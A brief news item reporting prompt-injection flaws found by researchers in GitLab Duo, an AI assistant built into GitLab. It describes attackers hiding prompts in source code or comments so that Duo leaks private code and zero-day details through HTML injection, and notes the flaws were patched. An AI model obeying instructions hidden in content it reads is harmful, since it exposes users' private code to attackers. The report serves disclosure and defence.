Critical Vulnerabilities in GitLab Duo Allow Source Code Exfiltration
2025-05-23
Researchers discovered critical vulnerabilities in GitLab Duo, an AI assistant integrated into GitLab. Attackers could embed hidden prompts within source code, comments, or other project content to manipulate Duo into leaking private source code and even zero-day vulnerabilities. The attack exploited Duo's context analysis and asynchronous Markdown rendering, leading to HTML injection and code theft. GitLab has since patched the vulnerabilities, but this incident highlights the importance of securing AI assistants. Any system incorporating LLMs must treat user input as untrusted and potentially malicious.
Tech
Source Code Leak